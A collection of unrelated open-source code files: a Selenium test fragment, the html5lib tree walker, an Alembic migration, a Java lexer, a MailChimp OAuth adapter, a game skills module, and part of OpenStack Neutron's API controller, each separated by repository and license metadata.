wait.until(
lambda dr: dr.get_window_size() != old_size if old_size["width"] != 200 and old_size["height"] != 200 \
else True)
size = self.driver.get_window_size()
self.driver.maximize_window()
wait.until(lambda dr: dr.get_window_size() != size)
new_size = self.driver.get_window_size()
assert new_size["width"] > size["width"]
assert new_size["height"] > size["height"]
def _pageURL(self, name):
return "http://localhost:%d/%s.html" % (self.webserver.port, name)
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
| apache-2.0 |
rwakulszowa/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/treewalkers/etree.py | 658 | 4613 | from __future__ import absolute_import, division, unicode_literals
try:
from collections import OrderedDict
except ImportError:
try:
from ordereddict import OrderedDict
except ImportError:
OrderedDict = dict
import gettext
_ = gettext.gettext
import re
from six import text_type
from . import _base
from ..utils import moduleFactoryFactory
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation):
ElementTree = ElementTreeImplementation
ElementTreeCommentType = ElementTree.Comment("asd").tag
class TreeWalker(_base.NonRecursiveTreeWalker):
"""Given the particular ElementTree representation, this implementation,
to avoid using recursion, returns "nodes" as tuples with the following
content:
1. The current element
2. The index of the element relative to its parent
3. A stack of ancestor elements
4. A flag "text", "tail" or None to indicate if the current node is a
text node; either the text or tail of the current element (1)
"""
def getNodeDetails(self, node):
if isinstance(node, tuple): # It might be the root Element
elt, key, parents, flag = node
if flag in ("text", "tail"):
return _base.TEXT, getattr(elt, flag)
else:
node = elt
if not(hasattr(node, "tag")):
node = node.getroot()
if node.tag in ("DOCUMENT_ROOT", "DOCUMENT_FRAGMENT"):
return (_base.DOCUMENT,)
elif node.tag == "<!DOCTYPE>":
return (_base.DOCTYPE, node.text,
node.get("publicId"), node.get("systemId"))
elif node.tag == ElementTreeCommentType:
return _base.COMMENT, node.text
else:
assert type(node.tag) == text_type, type(node.tag)
# This is assumed to be an ordinary element
match = tag_regexp.match(node.tag)
if match:
namespace, tag = match.groups()
else:
namespace = None
tag = node.tag
attrs = OrderedDict()
for name, value in list(node.attrib.items()):
match = tag_regexp.match(name)
if match:
attrs[(match.group(1), match.group(2))] = value
else:
attrs[(None, name)] = value
return (_base.ELEMENT, namespace, tag,
attrs, len(node) or node.text)
def getFirstChild(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
element, key, parents, flag = node, None, [], None
if flag in ("text", "tail"):
return None
else:
if element.text:
return element, key, parents, "text"
elif len(element):
parents.append(element)
return element[0], 0, parents, None
else:
return None
def getNextSibling(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
return None
if flag == "text":
if len(element):
parents.append(element)
return element[0], 0, parents, None
else:
return None
else:
if element.tail and flag != "tail":
return element, key, parents, "tail"
elif key < len(parents[-1]) - 1:
return parents[-1][key + 1], key + 1, parents, None
else:
return None
def getParentNode(self, node):
if isinstance(node, tuple):
element, key, parents, flag = node
else:
return None
if flag == "text":
if not parents:
return element
else:
return element, key, parents, None
else:
parent = parents.pop()
if not parents:
return parent
else:
return parent, list(parents[-1]).index(parent), parents, None
return locals()
getETreeModule = moduleFactoryFactory(getETreeBuilder)
| mpl-2.0 |
hieulq/pgscm | migrations/versions/5c3ebec69cdd_make_delete_modify_private.py | 2 | 4999 | """make deleted_at and modify_info column to private property
Revision ID: 5c3ebec69cdd
Revises: ef552a46d4ff
Create Date: 2017-07-26 21:28:30.229291
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '5c3ebec69cdd'
down_revision = 'ef552a46d4ff'
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('associate_group',
sa.Column('_deleted_at', sa.DateTime(), nullable=True))
op.add_column('associate_group',
sa.Column('_modify_info', sa.String(length=255),
nullable=True))
op.drop_index('a_group_code_index', table_name='associate_group')
op.create_index('a_group_code_index', 'associate_group',
['associate_group_code', '_deleted_at'], unique=False)
op.drop_column('associate_group', 'modify_info')
op.drop_column('associate_group', 'deleted_at')
op.add_column('certificate',
sa.Column('_deleted_at', sa.DateTime(), nullable=True))
op.add_column('certificate',
sa.Column('_modify_info', sa.String(length=255),
nullable=True))
op.drop_index('certificate_code_index', table_name='certificate')
op.create_index('certificate_code_index', 'certificate',
['certificate_code', '_deleted_at'], unique=False)
op.drop_index('certificate_code_index2', table_name='certificate')
op.drop_column('certificate', 'modify_info')
op.drop_column('certificate', 'deleted_at')
op.add_column('farmer',
sa.Column('_deleted_at', sa.DateTime(), nullable=True))
op.add_column('farmer', sa.Column('_modify_info', sa.String(length=255),
nullable=True))
op.drop_index('farmer_code_index', table_name='farmer')
op.create_index('farmer_code_index', 'farmer',
['farmer_code', '_deleted_at'], unique=False)
op.drop_column('farmer', 'modify_info')
op.drop_column('farmer', 'deleted_at')
op.add_column('group',
sa.Column('_deleted_at', sa.DateTime(), nullable=True))
op.add_column('group', sa.Column('_modify_info', sa.String(length=255),
nullable=True))
op.drop_index('group_code_index', table_name='group')
op.create_index('group_code_index', 'group', ['group_code', '_deleted_at'],
unique=False)
op.drop_column('group', 'modify_info')
op.drop_column('group', 'deleted_at')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('group',
sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
op.add_column('group', sa.Column('modify_info', mysql.VARCHAR(length=255),
nullable=True))
op.drop_index('group_code_index', table_name='group')
op.create_index('group_code_index', 'group', ['group_code', 'deleted_at'],
unique=False)
op.drop_column('group', '_modify_info')
op.drop_column('group', '_deleted_at')
op.add_column('farmer',
sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
op.add_column('farmer', sa.Column('modify_info', mysql.VARCHAR(length=255),
nullable=True))
op.drop_index('farmer_code_index', table_name='farmer')
op.create_index('farmer_code_index', 'farmer',
['farmer_code', 'deleted_at'], unique=False)
op.drop_column('farmer', '_modify_info')
op.drop_column('farmer', '_deleted_at')
op.add_column('certificate',
sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
op.add_column('certificate',
sa.Column('modify_info', mysql.VARCHAR(length=255),
nullable=True))
op.create_index('certificate_code_index2', 'certificate',
['certificate_code'], unique=False)
op.drop_index('certificate_code_index', table_name='certificate')
op.create_index('certificate_code_index', 'certificate',
['certificate_code', 'deleted_at'], unique=False)
op.drop_column('certificate', '_modify_info')
op.drop_column('certificate', '_deleted_at')
op.add_column('associate_group',
sa.Column('deleted_at', mysql.DATETIME(), nullable=True))
op.add_column('associate_group',
sa.Column('modify_info', mysql.VARCHAR(length=255),
nullable=True))
op.drop_index('a_group_code_index', table_name='associate_group')
op.create_index('a_group_code_index', 'associate_group',
['associate_group_code', 'deleted_at'], unique=False)
op.drop_column('associate_group', '_modify_info')
op.drop_column('associate_group', '_deleted_at')
# ### end Alembic commands ###
| apache-2.0 |
tunneln/CarnotKE | jyhton/out/production/jyhton/templates/java_lexer.py | 19 | 9325 | # copyright 2004-2005 Samuele Pedroni
"""
Java lexer
"""
import re
import types
class Token:
def __init__(self,type,value=None):
self.type = type
self.value = value
#
self.infront_comments = []
self.attached_comments = []
def __repr__(self):
return "%s(%r)" % (self.type,self.value)
def __eq__(self,other): # !!! ?
return self.type == other
def __ne__(self,other):
return self.type != other
# TokenList stores tokens attaching comments to appropriate tokens
class InfrontComment_State:
def __init__(self,toklist,tok=None):
self.toklist = toklist
if tok is not None:
self.comments = [tok]
else:
self.comments = []
def comment(self,tok):
self.comments.append(tok)
return self
def significative_token(self,tok):
tok.infront_comments = self.comments
return SignificativeToken_State(self.toklist,tok)
class SignificativeToken_State:
def __init__(self,toklist,tok):
self.toklist = toklist
self.tok_append = toklist.tokens.append
self.significative_token(tok)
def significative_token(self,tok):
self.tok_append(tok)
self.last = tok
return self
def comment(self,tok):
last = self.last
if last.lineno == tok.start:
return AttachedComment_State(self.toklist,last,tok)
else:
return InfrontComment_State(self.toklist,tok)
class AttachedComment_State:
def __init__(self,toklist,attach_to,tok):
self.toklist = toklist
attach_to.attached_comments = self.comments = [tok]
attach_to.attached_line_delta = 1
self.attach_to = attach_to
self.start = tok.start
self.col = tok.col
def set_attached_line_delta(self,tok):
self.attach_to.attached_line_delta = tok.lineno - self.comments[-1].end
def comment(self,tok):
if tok.start == self.start or tok.col == self.col:
self.comments.append(tok)
return self
else:
self.set_attached_line_delta(tok)
return InfrontComment_State(self.toklist,tok)
def significative_token(self,tok):
self.set_attached_line_delta(tok)
return SignificativeToken_State(self.toklist,tok)
class TokenList:
def __init__(self):
self.tokens = []
self.state = InfrontComment_State(self)
def add(self,tok):
if tok.type == 'COMMENT':
self.state = self.state.comment(tok)
else:
self.state = self.state.significative_token(tok)
def aslist(self):
return self.tokens
# Lexer
# construction
def CHOICE(*regexes):
return '|'.join([ "(%s)" % regex for regex in regexes])
def collect_simple():
global _pattern,_actions
patts = [ x for x in globals().items() if x[0].startswith('t_') ]
patts.sort(lambda x,y: -cmp(len(x[1]),len(y[1])))
patterns = []
for name,patt in patts:
type = name[2:]
_actions[name] = (type,None)
#print name,patt
patterns.append("(?P<%s>%s)" % (name,patt))
_pattern = '|'.join(patterns)
def add_w_action(type,action,patt=None):
global _pattern,_actions
name = action.__name__
_actions[name] = (type,action)
if patt is None:
patt = action.__doc__
patt = "(?P<%s>%s)" % (name,patt)
if _pattern:
_pattern = patt + "|" + _pattern
else:
_pattern = patt
def RESERVED(spec,resdict):
for res in re.split(r"(?:,|\s)+",spec): # split on , and whitespace
if res:
resdict[res.lower()] = res
return resdict
def finish_setup():
global _pattern
_pattern = re.compile(_pattern,re.VERBOSE)
groupindex = _pattern.groupindex
actions = _actions
for name,action in actions.items():
del actions[name]
actions[groupindex[name]] = action
# operators & delims
# delims
t_PLHSTARTPARMS = r'`\(' # for placeholder arguments
t_LPAREN, t_RPAREN = r'\(',r'\)'
t_LBRACK, t_RBRACK = r'\[',r'\]'
t_LBRACE, t_RBRACE = r'\{',r'\}'
t_SEMICOLON = r';'
t_COMMA = r','
t_COLON = r':'
# dot
t_DOT = r'\.'
# ellipsis
t_ELLIPSIS=r'\.\.\.'
# operators
t_MULT = r'\*'
t_EQ = r'='
t_PLUSPLUS = r'\+\+'
t_MINUSMINUS = r'--'
t_PLUS, t_MINUS, t_COMP, t_NOT, t_DIV, t_MOD = r'\+',r'-',r'~',r'!',r'/',r'%'
t_LSHIFT, t_RSHIFT, t_URSHIFT = r'<<',r'>>',r'>>>'
t_LT, t_GT, t_LTEQ, t_GTEQ = r'<',r'>',r'<=',r'>='
t_EQEQ, t_NOTEQ = r'==',r'!='
t_AND = r'&'
t_XOR = r'\^'
t_OR = r'\|'
t_ANDAND = r'&&'
t_OROR = r'\|\|'
t_QUESTION = r'\?'
t_MULTEQ = r'\*='
t_PLUSEQ, t_MINUSEQ, t_DIVEQ, t_MODEQ = r'\+=',r'-=',r'/=',r'%='
t_LSHIFTEQ, t_RSHIFTEQ, t_URSHIFTEQ = r'<<=',r'>>=',r'>>>='
t_ANDEQ = r'&='
t_XOREQ = r'\^='
t_OREQ = r'\|='
# literals
# floating point
t_FLOATING_POINT_LITERAL = CHOICE(
r'((\d*\.\d+)|(\d+\.\d*))([eE][+-]?\d+)?[fFdD]?',
r'\d+((([eE][+-]?\d+)[fFdD]?)|(([eE][+-]?\d+)?[fFdD]))' )
# integer
t_INTEGER_LITERAL = CHOICE(
r'0[0-7]+[lL]?', # oct
r'0[xX][0-9a-fA-F]+[lL]?', # hex
r'(0|([1-9]\d*))[lL]?' # dec
)
# for the moment accept \uXXXX only inside char/string literals
# this is not the spec way of doing things!
# chars
# ''' '\' are invalid
t_CHARACTER_LITERAL = r"'(\ |[^\s'\\])'|'\\([btnfr\"\'\\]|[0-3]?[0-7][0-7]?|u+[0-9a-fA-F]{4})'"
# string
t_STRING_LITERAL = r"\"(\ |[^\s\"\\]|\\([btnfr\"\'\\]|[0-3]?[0-7][0-7]?|u+[0-9a-fA-F]{4}))*\""
# placeholder
t_PLACEHOLDER = r'`[A-Za-z_$][\w_$]*'
_ignore = ' \t\x0c' # !!! tabs vs comment.col ?
_pattern = None
_actions = {}
collect_simple()
# comments
# COMMMENT: start,col up to end
def t_comment_c(lexer,tok): # fixed recursion problem at least when using 2.3
r' /\*[\S\s]*?\*/'
pos = lexer.pos
lineno = lexer.lineno
col = pos-lexer.line_start_pos
tok.start = lineno # == tok.lineno
tok.col = col
value = tok.value
lexer.lineno += value.count('\n')
tok.end = lexer.lineno
nl = value.rfind('\n')
if nl > -1:
lexer.line_start_pos = pos + nl + 1
add_w_action('COMMENT',t_comment_c)
def t_comment_cpp(lexer,tok): # \n? correct ?
r' //.*\n?'
pos = lexer.pos
lineno = lexer.lineno
col = pos-lexer.line_start_pos
tok.start = lineno # == tok.lineno
tok.col = col
tok.end = lineno
if tok.value[-1] == '\n':
lexer.lineno += 1
lexer.line_start_pos = pos + len(tok.value)
tok.value = tok.value[:-1]
add_w_action('COMMENT',t_comment_cpp)
# identifiers and reserved
_reserved = RESERVED("""
BOOLEAN
BYTE, SHORT, INT, LONG, CHAR
FLOAT, DOUBLE
PACKAGE
IMPORT
PUBLIC, PROTECTED, PRIVATE
STATIC
ABSTRACT, FINAL, NATIVE, SYNCHRONIZED, TRANSIENT, VOLATILE
CLASS
EXTENDS
IMPLEMENTS
VOID
THROWS
THIS, SUPER
INTERFACE
IF, ELSE
SWITCH
CASE, DEFAULT
DO, WHILE
FOR
BREAK
CONTINUE
RETURN
THROW
TRY
CATCH
FINALLY
NEW
INSTANCEOF
CONST, GOTO
STRICTFP
ASSERT
"""
#ENUM
, {
'null': 'NULL_LITERAL',
'true': 'BOOLEAN_LITERAL',
'false': 'BOOLEAN_LITERAL',
})
def t_identifier(lexer,tok):
r'[A-Za-z_$][\w_$]*'
tok.type = _reserved.get(tok.value,'IDENTIFIER')
add_w_action('IDENTIFIER',t_identifier)
finish_setup() # fix _pattern, _actions
class JavaLexer:
def __init__(self,s):
self.s = s
def error(self,ch):
raise Exception,"Illegal character %s" % repr(ch)
def scan(self):
ignore = _ignore
pattern = _pattern
actions = _actions
s = self.s
tokens = TokenList()
pos = 0
line_start_pos = 0
lineno = 1
stop = len(s)
while pos < stop:
ch = s[pos]
if ch == '\n':
lineno += 1
pos += 1
line_start_pos = pos
continue
if ch in ignore:
pos += 1
continue
m = _pattern.match(s,pos)
if m is None:
self.error(s[pos])
type,action = _actions[m.lastindex]
# make token
value = m.group()
tok = Token(type,value)
tok.lineno = lineno
if action:
self.lineno, self.pos, self.line_start_pos = lineno, pos, line_start_pos
action(self,tok)
lineno, line_start_pos = self.lineno, self.line_start_pos
pos += len(value)
tokens.add(tok)
# !!! ? pending comments
return tokens.aslist()
class _Bag:
pass
java_tokens = _Bag()
def concrete_toks():
toks = java_tokens
for name,t_patt in globals().items():
if (name.startswith('t_') and isinstance(t_patt,types.StringType)
and not name.endswith('LITERAL')):
name = name[2:]
val = t_patt.replace('\\','')
if re.match(t_patt,val):
setattr(toks,name,Token(name,val))
for val,name in _reserved.items():
if not name.endswith('LITERAL'):
setattr(toks,name,Token(name,val))
concrete_toks()
##if __name__ == '__main__':
## import sys
## f = open(sys.argv[1])
## s = f.read()
## f.close()
## for tok in JavaLexer(s).scan():
## print tok
| apache-2.0 |
okwow123/djangol2 | example/env/lib/python2.7/site-packages/allauth/socialaccount/providers/mailchimp/views.py | 10 | 1132 | """Views for MailChimp API v3."""
import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import MailChimpProvider
class MailChimpOAuth2Adapter(OAuth2Adapter):
"""OAuth2Adapter for MailChimp API v3."""
provider_id = MailChimpProvider.id
authorize_url = 'https://login.mailchimp.com/oauth2/authorize'
access_token_url = 'https://login.mailchimp.com/oauth2/token'
profile_url = 'https://login.mailchimp.com/oauth2/metadata'
def complete_login(self, request, app, token, **kwargs):
"""Complete login, ensuring correct OAuth header."""
headers = {'Authorization': 'OAuth {0}'.format(token.token)}
metadata = requests.get(self.profile_url, headers=headers)
extra_data = metadata.json()
return self.get_provider().sociallogin_from_response(request,
extra_data)
oauth2_login = OAuth2LoginView.adapter_view(MailChimpOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(MailChimpOAuth2Adapter)
| mit |
ej2/pixelpuncher | pixelpuncher/game/utils/skills.py | 1 | 1870 | from pixelpuncher.game.utils.message import add_game_message
from pixelpuncher.game.utils.messages import learned_skill_message
from pixelpuncher.player.models import PlayerSkill, Skill
def add_starting_skills(player):
skills = Skill.objects.filter(level=1)
for skill in skills:
create_player_skill(player, skill)
def add_skills(player, level):
skills = Skill.objects.filter(level=level)
for skill in skills:
create_player_skill(player, skill)
add_game_message(player, learned_skill_message(skill))
def create_player_skill(player, skill):
player_skill = PlayerSkill()
player_skill.skill = skill
player_skill.player = player
player_skill.hit_percentage = skill.hit_percentage
player_skill.critical_percentage = skill.critical_percentage
player_skill.critical_multipler = skill.critical_multipler
player_skill.energy_cost = skill.energy_cost
player_skill.number_of_dice = skill.number_of_dice
player_skill.dice_sides = skill.dice_sides
player_skill.bonus = skill.bonus
player_skill.remaining_for_level_up = skill.gain_frequency
player_skill.save()
return player_skill
def level_skill(player_skill):
level_up = False
player_skill.remaining_for_level_up -= 1
if player_skill.remaining_for_level_up == 0:
level_up = True
player_skill.level += 1
player_skill.hit_percentage += player_skill.skill.gained_hit
player_skill.critical_percentage += player_skill.skill.gained_critical
player_skill.critical_multipler += player_skill.skill.gained_critical_multipler
player_skill.energy_cost += player_skill.skill.gained_energy_cost
player_skill.bonus += player_skill.skill.gained_bonus
player_skill.remaining_for_level_up = player_skill.skill.gain_frequency
player_skill.save()
return level_up
| bsd-3-clause |
virtualopensystems/neutron | neutron/api/v2/base.py | 5 | 31187 | # Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import netaddr
import webob.exc
from oslo.config import cfg
from neutron.api import api_common
from neutron.api.rpc.agentnotifiers import dhcp_rpc_agent_api
from neutron.api.v2 import attributes
from neutron.api.v2 import resource as wsgi_resource
from neutron.common import constants as const
from neutron.common import exceptions
from neutron.common import rpc as n_rpc
from neutron.openstack.common import log as logging
from neutron import policy
from neutron import quota
LOG = logging.getLogger(__name__)
FAULT_MAP = {exceptions.NotFound: webob.exc.HTTPNotFound,
exceptions.Conflict: webob.exc.HTTPConflict,
exceptions.InUse: webob.exc.HTTPConflict,
exceptions.BadRequest: webob.exc.HTTPBadRequest,
exceptions.ServiceUnavailable: webob.exc.HTTPServiceUnavailable,
exceptions.NotAuthorized: webob.exc.HTTPForbidden,
netaddr.AddrFormatError: webob.exc.HTTPBadRequest,
}
class Controller(object):
LIST = 'list'
SHOW = 'show'
CREATE = 'create'
UPDATE = 'update'
DELETE = 'delete'
def __init__(self, plugin, collection, resource, attr_info,
allow_bulk=False, member_actions=None, parent=None,
allow_pagination=False, allow_sorting=False):
if member_actions is None:
member_actions = []
self._plugin = plugin
self._collection = collection.replace('-', '_')
self._resource = resource.replace('-', '_')
self._attr_info = attr_info
self._allow_bulk = allow_bulk
self._allow_pagination = allow_pagination
self._allow_sorting = allow_sorting
self._native_bulk = self._is_native_bulk_supported()
self._native_pagination = self._is_native_pagination_supported()
self._native_sorting = self._is_native_sorting_supported()
self._policy_attrs = [name for (name, info) in self._attr_info.items()
if info.get('required_by_policy')]
self._notifier = n_rpc.get_notifier('network')
# use plugin's dhcp notifier, if this is already instantiated
agent_notifiers = getattr(plugin, 'agent_notifiers', {})
self._dhcp_agent_notifier = (
agent_notifiers.get(const.AGENT_TYPE_DHCP) or
dhcp_rpc_agent_api.DhcpAgentNotifyAPI()
)
if cfg.CONF.notify_nova_on_port_data_changes:
from neutron.notifiers import nova
self._nova_notifier = nova.Notifier()
self._member_actions = member_actions
self._primary_key = self._get_primary_key()
if self._allow_pagination and self._native_pagination:
# Native pagination need native sorting support
if not self._native_sorting:
raise exceptions.Invalid(
_("Native pagination depend on native sorting")
)
if not self._allow_sorting:
LOG.info(_("Allow sorting is enabled because native "
"pagination requires native sorting"))
self._allow_sorting = True
if parent:
self._parent_id_name = '%s_id' % parent['member_name']
parent_part = '_%s' % parent['member_name']
else:
self._parent_id_name = None
parent_part = ''
self._plugin_handlers = {
self.LIST: 'get%s_%s' % (parent_part, self._collection),
self.SHOW: 'get%s_%s' % (parent_part, self._resource)
}
for action in [self.CREATE, self.UPDATE, self.DELETE]:
self._plugin_handlers[action] = '%s%s_%s' % (action, parent_part,
self._resource)
def _get_primary_key(self, default_primary_key='id'):
for key, value in self._attr_info.iteritems():
if value.get('primary_key', False):
return key
return default_primary_key
def _is_native_bulk_supported(self):
native_bulk_attr_name = ("_%s__native_bulk_support"
% self._plugin.__class__.__name__)
return getattr(self._plugin, native_bulk_attr_name, False)
def _is_native_pagination_supported(self):
native_pagination_attr_name = ("_%s__native_pagination_support"
% self._plugin.__class__.__name__)
return getattr(self._plugin, native_pagination_attr_name, False)
def _is_native_sorting_supported(self):
native_sorting_attr_name = ("_%s__native_sorting_support"
% self._plugin.__class__.__name__)
return getattr(self._plugin, native_sorting_attr_name, False)
def _exclude_attributes_by_policy(self, context, data):
"""Identifies attributes to exclude according to authZ policies.
Return a list of attribute names which should be stripped from the
response returned to the user because the user is not authorized
to see them.
"""
attributes_to_exclude = []
for attr_name in data.keys():
attr_data = self._attr_info.get(attr_name)
if attr_data and attr_data['is_visible']:
if policy.check(
context,
'%s:%s' % (self._plugin_handlers[self.SHOW], attr_name),
data,
might_not_exist=True):
# this attribute is visible, check next one
continue
# if the code reaches this point then either the policy check
# failed or the attribute was not visible in the first place
attributes_to_exclude.append(attr_name)
return attributes_to_exclude
def _view(self, context, data, fields_to_strip=None):
"""Build a view of an API resource.
:param context: the neutron context
:param data: the object for which a view is being created
:param fields_to_strip: attributes to remove from the view
:returns: a view of the object which includes only attributes
visible according to API resource declaration and authZ policies.
"""
fields_to_strip = ((fields_to_strip or []) +
self._exclude_attributes_by_policy(context, data))
return self._filter_attributes(context, data, fields_to_strip)
def _filter_attributes(self, context, data, fields_to_strip=None):
if not fields_to_strip:
return data
return dict(item for item in data.iteritems()
if (item[0] not in fields_to_strip))
def _do_field_list(self, original_fields):
fields_to_add = None
# don't do anything if fields were not specified in the request
if original_fields:
fields_to_add = [attr for attr in self._policy_attrs
if attr not in original_fields]
original_fields.extend(self._policy_attrs)
return original_fields, fields_to_add
def __getattr__(self, name):
if name in self._member_actions:
def _handle_action(request, id, **kwargs):
arg_list = [request.context, id]
# Ensure policy engine is initialized
policy.init()
# Fetch the resource and verify if the user can access it
try:
resource = self._item(request, id, True)
except exceptions.PolicyNotAuthorized:
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
body = kwargs.pop('body', None)
# Explicit comparison with None to distinguish from {}
if body is not None:
arg_list.append(body)
# It is ok to raise a 403 because accessibility to the
# object was checked earlier in this method
policy.enforce(request.context, name, resource)
return getattr(self._plugin, name)(*arg_list, **kwargs)
return _handle_action
else:
raise AttributeError
def _get_pagination_helper(self, request):
if self._allow_pagination and self._native_pagination:
return api_common.PaginationNativeHelper(request,
self._primary_key)
elif self._allow_pagination:
return api_common.PaginationEmulatedHelper(request,
self._primary_key)
return api_common.NoPaginationHelper(request, self._primary_key)
def _get_sorting_helper(self, request):
if self._allow_sorting and self._native_sorting:
return api_common.SortingNativeHelper(request, self._attr_info)
elif self._allow_sorting:
return api_common.SortingEmulatedHelper(request, self._attr_info)
return api_common.NoSortingHelper(request, self._attr_info)
def _items(self, request, do_authz=False, parent_id=None):
"""Retrieves and formats a list of elements of the requested entity."""
# NOTE(salvatore-orlando): The following ensures that fields which
# are needed for authZ policy validation are not stripped away by the
# plugin before returning.
original_fields, fields_to_add = self._do_field_list(
api_common.list_args(request, 'fields'))
filters = api_common.get_filters(request, self._attr_info,
['fields', 'sort_key', 'sort_dir',
'limit', 'marker', 'page_reverse'])
kwargs = {'filters': filters,
'fields': original_fields}
sorting_helper = self._get_sorting_helper(request)
pagination_helper = self._get_pagination_helper(request)
sorting_helper.update_args(kwargs)
sorting_helper.update_fields(original_fields, fields_to_add)
pagination_helper.update_args(kwargs)
pagination_helper.update_fields(original_fields, fields_to_add)
if parent_id:
kwargs[self._parent_id_name] = parent_id
obj_getter = getattr(self._plugin, self._plugin_handlers[self.LIST])
obj_list = obj_getter(request.context, **kwargs)
obj_list = sorting_helper.sort(obj_list)
obj_list = pagination_helper.paginate(obj_list)
# Check authz
if do_authz:
# FIXME(salvatore-orlando): obj_getter might return references to
# other resources. Must check authZ on them too.
# Omit items from list that should not be visible
obj_list = [obj for obj in obj_list
if policy.check(request.context,
self._plugin_handlers[self.SHOW],
obj,
plugin=self._plugin)]
# Use the first element in the list for discriminating which attributes
# should be filtered out because of authZ policies
# fields_to_add contains a list of attributes added for request policy
# checks but that were not required by the user. They should be
# therefore stripped
fields_to_strip = fields_to_add or []
if obj_list:
fields_to_strip += self._exclude_attributes_by_policy(
request.context, obj_list[0])
collection = {self._collection:
[self._filter_attributes(
request.context, obj,
fields_to_strip=fields_to_strip)
for obj in obj_list]}
pagination_links = pagination_helper.get_links(obj_list)
if pagination_links:
collection[self._collection + "_links"] = pagination_links
return collection
def _item(self, request, id, do_authz=False, field_list=None,
parent_id=None):
"""Retrieves and formats a single element of the requested entity."""
kwargs = {'fields': field_list}
action = self._plugin_handlers[self.SHOW]
if parent_id:
kwargs[self._parent_id_name] = parent_id
obj_getter = getattr(self._plugin, action)
obj = obj_getter(request.context, id, **kwargs)
# Check authz
# FIXME(salvatore-orlando): obj_getter might return references to
# other resources. Must check authZ on them too.
if do_authz:
policy.enforce(request.context, action, obj)
return obj
def _send_dhcp_notification(self, context, data, methodname):
if cfg.CONF.dhcp_agent_notification:
if self._collection in data:
for body in data[self._collection]:
item = {self._resource: body}
self._dhcp_agent_notifier.notify(context, item, methodname)
else:
self._dhcp_agent_notifier.notify(context, data, methodname)
def _send_nova_notification(self, action, orig, returned):
if hasattr(self, '_nova_notifier'):
self._nova_notifier.send_network_change(action, orig, returned)
def index(self, request, **kwargs):
"""Returns a list of the requested entity."""
parent_id = kwargs.get(self._parent_id_name)
# Ensure policy engine is initialized
policy.init()
return self._items(request, True, parent_id)
def show(self, request, id, **kwargs):
"""Returns detailed information about the requested entity."""
try:
# NOTE(salvatore-orlando): The following ensures that fields
# which are needed for authZ policy validation are not stripped
# away by the plugin before returning.
field_list, added_fields = self._do_field_list(
api_common.list_args(request, "fields"))
parent_id = kwargs.get(self._parent_id_name)
# Ensure policy engine is initialized
policy.init()
return {self._resource:
self._view(request.context,
self._item(request,
id,
do_authz=True,
field_list=field_list,
parent_id=parent_id),
fields_to_strip=added_fields)}
except exceptions.PolicyNotAuthorized:
# To avoid giving away information, pretend that it
# doesn't exist
msg = _('The resource could not be found.')
raise webob.exc.HTTPNotFound(msg)
def _emulate_bulk_create(self, obj_creator, request, body, parent_id=None):
objs = []
try:
for item in body[self._collection]:
kwargs = {self._resource: item}
if parent_id:
kwargs[self._parent_id_name] = parent_id
fields_to_strip = self._exclude_attributes_by_policy(
request.context, item)
objs.append(self._filter_attributes(
request.context,
obj_creator(request.context, **kwargs),
fields_to_strip=fields_to_strip))
return objs
# Note(salvatore-orlando): broad catch as in theory a plugin
# could raise any kind of exception
except Exception as ex:
for obj in objs:
obj_deleter = getattr(self._plugin,
self._plugin_handlers[self.DELETE])
try:
kwargs = ({self._parent_id_name: parent_id} if parent_id
else {})
obj_deleter(request.context, obj['id'], **kwargs)
except Exception:
# broad catch as our only purpose is to log the exception
LOG.exception(_("Unable to undo add for "
"%(resource)s %(id)s"),
{'resource': self._resource,
'id': obj['id']})
# TODO(salvatore-orlando): The object being processed when the
# plugin raised might have been created or not in the db.
# We need a way for ensuring that if it has been created,
# it is then deleted
raise ex
def create(self, request, body=None, **kwargs):
"""Creates a new instance of the requested entity."""
parent_id = kwargs.get(self._parent_id_name)
self._notifier.info(request.context,
self._resource + '.create.start',
body)
body = Controller.prepare_request_body(request.context, body, True,
self._resource, self._attr_info,
allow_bulk=self._allow_bulk)
action = self._plugin_handlers[self.CREATE]
# Check authz
if self._collection in body:
# Have to account for bulk create
items = body[self._collection]
deltas = {}
bulk = True
else:
items = [body]
bulk = False
# Ensure policy engine is initialized
policy.init()
for item in items:
self._validate_network_tenant_ownership(request,
item[self._resource])
policy.enforce(request.context,
action,
item[self._resource])
try:
tenant_id = item[self._resource]['tenant_id']
count = quota.QUOTAS.count(request.context, self._resource,
self._plugin, self._collection,
tenant_id)
if bulk:
delta = deltas.get(tenant_id, 0) + 1
deltas[tenant_id] = delta
else:
delta = 1
kwargs = {self._resource: count + delta}
except exceptions.QuotaResourceUnknown as e:
# We don't want to quota this resource
LOG.debug(e)
else:
quota.QUOTAS.limit_check(request.context,
item[self._resource]['tenant_id'],
**kwargs)
def notify(create_result):
notifier_method = self._resource + '.create.end'
self._notifier.info(request.context,
notifier_method,
create_result)
self._send_dhcp_notification(request.context,
create_result,
notifier_method)
return create_result
kwargs = {self._parent_id_name: parent_id} if parent_id else {}
if self._collection in body and self._native_bulk:
# plugin does atomic bulk create operations
obj_creator = getattr(self._plugin, "%s_bulk" % action)
objs = obj_creator(request.context, body, **kwargs)
# Use first element of list to discriminate attributes which
# should be removed because of authZ policies
